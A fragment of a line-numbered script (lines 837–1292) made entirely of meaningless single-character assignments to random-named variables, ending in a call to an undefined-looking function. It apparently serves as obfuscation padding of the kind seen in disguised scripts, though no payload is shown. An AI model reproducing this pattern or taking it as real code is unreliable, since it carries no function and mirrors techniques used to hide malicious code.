837 | awbwovs = "l"; | |
838 | awbwovs = "Z"; | |
839 | awbwovs = "H"; | |
840 | awbwovs = "V"; | |
841 | awbwovs = "u"; | |
842 | awbwovs = "a"; | |
843 | awbwovs = "U"; | |
844 | awbwovs = "p"; | |
845 | awbwovs = "J"; | |
846 | awbwovs = "c"; | |
847 | awbwovs = "z"; | |
848 | awbwovs = "K"; | |
849 | awbwovs = "C"; | |
850 | awbwovs = "Q"; | |
851 | awbwovs = "u"; | |
852 | awbwovs = "k"; | |
853 | shrqag = "Y"; | |
854 | shrqag = "h"; | |
855 | shrqag = "u"; | |
856 | shrqag = "H"; | |
857 | shrqag = "S"; | |
858 | shrqag = "z"; | |
859 | shrqag = "G"; | |
860 | shrqag = "A"; | |
861 | shrqag = "c"; | |
862 | shrqag = "j"; | |
863 | shrqag = "V"; | |
864 | shrqag = "Q"; | |
865 | joyrrety = "E"; | |
866 | joyrrety = "l"; | |
867 | joyrrety = "T"; | |
868 | joyrrety = "S"; | |
869 | zocsuf = "N"; | |
870 | zocsuf = "i"; | |
871 | zocsuf = "L"; | |
872 | zocsuf = "B"; | |
873 | zocsuf = "I"; | |
874 | zocsuf = "k"; | |
875 | zocsuf = "f"; | |
876 | zocsuf = "y"; | |
877 | zocsuf = "f"; | |
878 | zocsuf = "v"; | |
879 | zocsuf = "y"; | |
880 | zocsuf = "W"; | |
881 | vdyvhclsy = "k"; | |
882 | vdyvhclsy = "I"; | |
883 | vdyvhclsy = "r"; | |
884 | vdyvhclsy = "i"; | |
885 | vdyvhclsy = "V"; | |
886 | vdyvhclsy = "p"; | |
887 | vdyvhclsy = "v"; | |
888 | vdyvhclsy = "B"; | |
889 | vdyvhclsy = "%"; | |
890 | vgeet = "q"; | |
891 | vgeet = "D"; | |
892 | vgeet = "P"; | |
893 | vgeet = "q"; | |
894 | vgeet = "w"; | |
895 | vgeet = "K"; | |
896 | vgeet = "I"; | |
897 | vgeet = "e"; | |
898 | vgeet = "h"; | |
899 | vgeet = "o"; | |
900 | vgeet = "a"; | |
901 | vgeet = "o"; | |
902 | vgeet = "M"; | |
903 | vgeet = "N"; | |
904 | vgeet = "e"; | |
905 | vgeet = "j"; | |
906 | vgeet = "e"; | |
907 | vgeet = "o"; | |
908 | vgeet = "K"; | |
909 | vgeet = "C"; | |
910 | nmlhinbkr = "r"; | |
911 | nmlhinbkr = "v"; | |
912 | nmlhinbkr = "j"; | |
913 | nmlhinbkr = "J"; | |
914 | nmlhinbkr = "E"; | |
915 | nmlhinbkr = "f"; | |
916 | nmlhinbkr = "S"; | |
917 | nmlhinbkr = "M"; | |
918 | nmlhinbkr = "h"; | |
919 | nmlhinbkr = "a"; | |
920 | nmlhinbkr = "n"; | |
921 | nmlhinbkr = "X"; | |
922 | nmlhinbkr = "L"; | |
923 | nmlhinbkr = "B"; | |
924 | nmlhinbkr = "z"; | |
925 | nmlhinbkr = "W"; | |
926 | nmlhinbkr = "V"; | |
927 | nmlhinbkr = "S"; | |
928 | nmlhinbkr = "t"; | |
929 | nmlhinbkr = "g"; | |
930 | nmlhinbkr = "B"; | |
931 | nmlhinbkr = "X"; | |
932 | nmlhinbkr = "D"; | |
933 | nmlhinbkr = "x"; | |
934 | nmlhinbkr = "d"; | |
935 | nmlhinbkr = "L"; | |
936 | nmlhinbkr = "u"; | |
937 | nmlhinbkr = "\\"; | |
938 | kfxhzojuo = "n"; | |
939 | kfxhzojuo = "T"; | |
940 | kfxhzojuo = "f"; | |
941 | kfxhzojuo = "q"; | |
942 | kfxhzojuo = "G"; | |
943 | kfxhzojuo = "K"; | |
944 | kfxhzojuo = "t"; | |
945 | kfxhzojuo = "o"; | |
946 | kfxhzojuo = "N"; | |
947 | kfxhzojuo = "m"; | |
948 | kfxhzojuo = "u"; | |
949 | kfxhzojuo = "N"; | |
950 | kfxhzojuo = "/"; | |
951 | lwkgztd = "o"; | |
952 | lwkgztd = "N"; | |
953 | lwkgztd = "o"; | |
954 | lwkgztd = "r"; | |
955 | alpxvaw = "x"; | |
956 | alpxvaw = "u"; | |
957 | alpxvaw = "G"; | |
958 | alpxvaw = "D"; | |
959 | alpxvaw = "H"; | |
960 | alpxvaw = "p"; | |
961 | alpxvaw = "D"; | |
962 | alpxvaw = "e"; | |
963 | alpxvaw = "f"; | |
964 | alpxvaw = "R"; | |
965 | alpxvaw = "U"; | |
966 | alpxvaw = "O"; | |
967 | alpxvaw = "Y"; | |
968 | alpxvaw = "M"; | |
969 | alpxvaw = "d"; | |
970 | alpxvaw = "S"; | |
971 | alpxvaw = "W"; | |
972 | alpxvaw = "g"; | |
973 | alpxvaw = "C"; | |
974 | alpxvaw = "M"; | |
975 | alpxvaw = "N"; | |
976 | alpxvaw = "b"; | |
977 | alpxvaw = "o"; | |
978 | ardkhyhjf = "o"; | |
979 | ardkhyhjf = "F"; | |
980 | ardkhyhjf = "L"; | |
981 | ardkhyhjf = "X"; | |
982 | ardkhyhjf = "i"; | |
983 | ardkhyhjf = "9"; | |
984 | fgrxiafp = "k"; | |
985 | fgrxiafp = "T"; | |
986 | fgrxiafp = "T"; | |
987 | jkqrlyqmj = "q"; | |
988 | jkqrlyqmj = "E"; | |
989 | jkqrlyqmj = "F"; | |
990 | jkqrlyqmj = "T"; | |
991 | jkqrlyqmj = "T"; | |
992 | jkqrlyqmj = "o"; | |
993 | jkqrlyqmj = "R"; | |
994 | jkqrlyqmj = "Y"; | |
995 | jkqrlyqmj = "0"; | |
996 | yjxhigm = "A"; | |
997 | yjxhigm = "Z"; | |
998 | yjxhigm = "j"; | |
999 | yjxhigm = "O"; | |
1000 | yjxhigm = "c"; | |
1001 | yjxhigm = "L"; | |
1002 | yjxhigm = "D"; | |
1003 | yjxhigm = "m"; | |
1004 | yjxhigm = "i"; | |
1005 | yjxhigm = "P"; | |
1006 | yjxhigm = "W"; | |
1007 | yjxhigm = "l"; | |
1008 | yjxhigm = "a"; | |
1009 | yjxhigm = "m"; | |
1010 | yjxhigm = "F"; | |
1011 | yjxhigm = "P"; | |
1012 | yjxhigm = "k"; | |
1013 | yjxhigm = "z"; | |
1014 | yjxhigm = "a"; | |
1015 | yjxhigm = "r"; | |
1016 | yjxhigm = "S"; | |
1017 | yjxhigm = "P"; | |
1018 | ljcfea = "g"; | |
1019 | ljcfea = "y"; | |
1020 | ljcfea = "A"; | |
1021 | ljcfea = "p"; | |
1022 | ljcfea = "J"; | |
1023 | ljcfea = "J"; | |
1024 | ljcfea = "R"; | |
1025 | ljcfea = "J"; | |
1026 | ljcfea = "O"; | |
1027 | ljcfea = "I"; | |
1028 | ljcfea = "P"; | |
1029 | ljcfea = "G"; | |
1030 | ljcfea = "W"; | |
1031 | ljcfea = "x"; | |
1032 | ljcfea = "M"; | |
1033 | ljcfea = "p"; | |
1034 | ljcfea = "f"; | |
1035 | ljcfea = "J"; | |
1036 | ljcfea = "F"; | |
1037 | ljcfea = "i"; | |
1038 | ljcfea = "T"; | |
1039 | ljcfea = "m"; | |
1040 | ljcfea = "i"; | |
1041 | ljcfea = "l"; | |
1042 | ljcfea = "C"; | |
1043 | ljcfea = "z"; | |
1044 | ljcfea = "M"; | |
1045 | ljcfea = "u"; | |
1046 | ljcfea = "I"; | |
1047 | ljcfea = "W"; | |
1048 | ljcfea = "D"; | |
1049 | ljcfea = "1"; | |
1050 | dowiao = "V"; | |
1051 | dowiao = "K"; | |
1052 | dowiao = "m"; | |
1053 | dowiao = "x"; | |
1054 | dowiao = "e"; | |
1055 | dowiao = "x"; | |
1056 | dowiao = "u"; | |
1057 | dowiao = "f"; | |
1058 | dowiao = "k"; | |
1059 | dowiao = "v"; | |
1060 | dowiao = "Z"; | |
1061 | dowiao = "t"; | |
1062 | dowiao = "n"; | |
1063 | dowiao = "U"; | |
1064 | dowiao = "k"; | |
1065 | dowiao = "Z"; | |
1066 | dowiao = "g"; | |
1067 | dowiao = "O"; | |
1068 | dowiao = "C"; | |
1069 | dowiao = "T"; | |
1070 | dowiao = "v"; | |
1071 | dowiao = "t"; | |
1072 | dowiao = "Y"; | |
1073 | dowiao = "l"; | |
1074 | gnwheuymv = "R"; | |
1075 | eifip = "w"; | |
1076 | eifip = "O"; | |
1077 | eifip = "i"; | |
1078 | eifip = "x"; | |
1079 | eifip = "o"; | |
1080 | eifip = "r"; | |
1081 | eifip = "u"; | |
1082 | eifip = "L"; | |
1083 | eifip = "y"; | |
1084 | eifip = "l"; | |
1085 | eifip = "S"; | |
1086 | eifip = "u"; | |
1087 | eifip = "g"; | |
1088 | eifip = "F"; | |
1089 | eifip = "b"; | |
1090 | eifip = "J"; | |
1091 | eifip = "X"; | |
1092 | eifip = "l"; | |
1093 | eifip = "z"; | |
1094 | eifip = "z"; | |
1095 | eifip = "j"; | |
1096 | eifip = "d"; | |
1097 | eifip = "x"; | |
1098 | eifip = "X"; | |
1099 | eifip = "k"; | |
1100 | eifip = "T"; | |
1101 | eifip = "i"; | |
1102 | eifip = "E"; | |
1103 | eifip = "P"; | |
1104 | eifip = "v"; | |
1105 | eifip = "k"; | |
1106 | eifip = "P"; | |
1107 | eifip = "I"; | |
1108 | eifip = "Y"; | |
1109 | eifip = "N"; | |
1110 | eifip = "d"; | |
1111 | eifip = "s"; | |
1112 | eifip = "E"; | |
1113 | eifip = "R"; | |
1114 | eifip = "O"; | |
1115 | eifip = "K"; | |
1116 | eifip = "Y"; | |
1117 | sbufxsjpb = "v"; | |
1118 | sbufxsjpb = "C"; | |
1119 | sbufxsjpb = "x"; | |
1120 | sbufxsjpb = "Q"; | |
1121 | sbufxsjpb = "X"; | |
1122 | sbufxsjpb = "l"; | |
1123 | sbufxsjpb = "u"; | |
1124 | sbufxsjpb = "W"; | |
1125 | sbufxsjpb = "f"; | |
1126 | sbufxsjpb = "T"; | |
1127 | sbufxsjpb = "l"; | |
1128 | sbufxsjpb = "K"; | |
1129 | sbufxsjpb = "e"; | |
1130 | sbufxsjpb = "3"; | |
1131 | ndiaggrdd = "r"; | |
1132 | ndiaggrdd = "k"; | |
1133 | ndiaggrdd = "u"; | |
1134 | ndiaggrdd = "E"; | |
1135 | ndiaggrdd = "I"; | |
1136 | ndiaggrdd = "G"; | |
1137 | ndiaggrdd = "W"; | |
1138 | ndiaggrdd = "s"; | |
1139 | ndiaggrdd = "h"; | |
1140 | ndiaggrdd = "h"; | |
1141 | ndiaggrdd = "C"; | |
1142 | ndiaggrdd = "o"; | |
1143 | ndiaggrdd = "Y"; | |
1144 | ndiaggrdd = "f"; | |
1145 | ndiaggrdd = "y"; | |
1146 | ndiaggrdd = "M"; | |
1147 | ndiaggrdd = "W"; | |
1148 | ndiaggrdd = "x"; | |
1149 | ndiaggrdd = "k"; | |
1150 | ndiaggrdd = "X"; | |
1151 | ndiaggrdd = "j"; | |
1152 | ndiaggrdd = "z"; | |
1153 | ndiaggrdd = "o"; | |
1154 | ndiaggrdd = "Z"; | |
1155 | ndiaggrdd = "m"; | |
1156 | ndiaggrdd = "r"; | |
1157 | ndiaggrdd = "p"; | |
1158 | ndiaggrdd = "w"; | |
1159 | pbxjqgo = "l"; | |
1160 | pbxjqgo = "e"; | |
1161 | pbxjqgo = "A"; | |
1162 | pbxjqgo = "H"; | |
1163 | pbxjqgo = "T"; | |
1164 | pbxjqgo = "N"; | |
1165 | pbxjqgo = "x"; | |
1166 | pbxjqgo = "G"; | |
1167 | pbxjqgo = "a"; | |
1168 | pbxjqgo = "G"; | |
1169 | pbxjqgo = "w"; | |
1170 | pbxjqgo = "P"; | |
1171 | pbxjqgo = "t"; | |
1172 | pbxjqgo = "F"; | |
1173 | pbxjqgo = "o"; | |
1174 | pbxjqgo = "n"; | |
1175 | pbxjqgo = "K"; | |
1176 | pbxjqgo = "q"; | |
1177 | mzhkq = "W"; | |
1178 | mzhkq = "h"; | |
1179 | mzhkq = "g"; | |
1180 | mzhkq = "Y"; | |
1181 | mzhkq = "N"; | |
1182 | mzhkq = "b"; | |
1183 | mzhkq = "Z"; | |
1184 | mzhkq = "U"; | |
1185 | mzhkq = "X"; | |
1186 | mzhkq = "E"; | |
1187 | mzhkq = "r"; | |
1188 | mzhkq = "z"; | |
1189 | mzhkq = "j"; | |
1190 | mzhkq = "i"; | |
1191 | mzhkq = "Q"; | |
1192 | mzhkq = "D"; | |
1193 | mzhkq = "A"; | |
1194 | mzhkq = "q"; | |
1195 | mzhkq = "h"; | |
1196 | mzhkq = "H"; | |
1197 | mzhkq = "D"; | |
1198 | mzhkq = "P"; | |
1199 | mzhkq = "E"; | |
1200 | mzhkq = "f"; | |
1201 | mzhkq = "D"; | |
1202 | mzhkq = "x"; | |
1203 | cromdiwup = "t"; | |
1204 | cromdiwup = "K"; | |
1205 | cromdiwup = "h"; | |
1206 | cromdiwup = "L"; | |
1207 | cromdiwup = "K"; | |
1208 | cromdiwup = "p"; | |
1209 | cromdiwup = "j"; | |
1210 | cromdiwup = "q"; | |
1211 | cromdiwup = "f"; | |
1212 | cromdiwup = "m"; | |
1213 | cromdiwup = "L"; | |
1214 | cromdiwup = "p"; | |
1215 | cromdiwup = "U"; | |
1216 | wuoye = "T"; | |
1217 | wuoye = "m"; | |
1218 | wuoye = "Y"; | |
1219 | wuoye = "f"; | |
1220 | wuoye = "c"; | |
1221 | lownhv = "t"; | |
1222 | lownhv = "m"; | |
1223 | lownhv = "H"; | |
1224 | lownhv = "N"; | |
1225 | lownhv = "X"; | |
1226 | lownhv = "G"; | |
1227 | lownhv = "p"; | |
1228 | lownhv = "d"; | |
1229 | lownhv = "J"; | |
1230 | lownhv = "g"; | |
1231 | lownhv = "v"; | |
1232 | lownhv = "v"; | |
1233 | lownhv = "s"; | |
1234 | lownhv = "l"; | |
1235 | lownhv = "A"; | |
1236 | lownhv = "r"; | |
1237 | lownhv = "C"; | |
1238 | lownhv = "x"; | |
1239 | lownhv = "v"; | |
1240 | lownhv = "L"; | |
1241 | lownhv = "k"; | |
1242 | lownhv = "V"; | |
1243 | lownhv = "d"; | |
1244 | lownhv = "X"; | |
1245 | lownhv = "r"; | |
1246 | lownhv = "N"; | |
1247 | lownhv = "Q"; | |
1248 | lownhv = "m"; | |
1249 | lownhv = "r"; | |
1250 | lownhv = "D"; | |
1251 | lownhv = "s"; | |
1252 | lownhv = "z"; | |
1253 | lownhv = "J"; | |
1254 | lownhv = "t"; | |
1255 | lownhv = "t"; | |
1256 | lownhv = "k"; | |
1257 | lownhv = "J"; | |
1258 | lownhv = "S"; | |
1259 | lownhv = "w"; | |
1260 | lownhv = "O"; | |
1261 | lownhv = "R"; | |
1262 | lownhv = "H"; | |
1263 | lownhv = "t"; | |
1264 | vivmabb = "x"; | |
1265 | vivmabb = "O"; | |
1266 | vivmabb = "f"; | |
1267 | vivmabb = "r"; | |
1268 | vivmabb = "o"; | |
1269 | vivmabb = "M"; | |
1270 | vivmabb = "T"; | |
1271 | vivmabb = "x"; | |
1272 | vivmabb = "T"; | |
1273 | vivmabb = "M"; | |
1274 | vivmabb = "P"; | |
1275 | vivmabb = "X"; | |
1276 | vivmabb = "m"; | |
1277 | vivmabb = "f"; | |
1278 | vivmabb = "x"; | |
1279 | vivmabb = "L"; | |
1280 | vivmabb = "M"; | |
1281 | vivmabb = "S"; | |
1282 | vivmabb = "S"; | |
1283 | vivmabb = "n"; | |
1284 | vivmabb = "a"; | |
1285 | vivmabb = "s"; | |
1286 | vivmabb = "l"; | |
1287 | vivmabb = "Q"; | |
1288 | vivmabb = "o"; | |
1289 | vivmabb = "T"; | |
1290 | vivmabb = "s"; | |
1291 | vivmabb = "H"; | |
1292 | zxqjytm ( ); |
|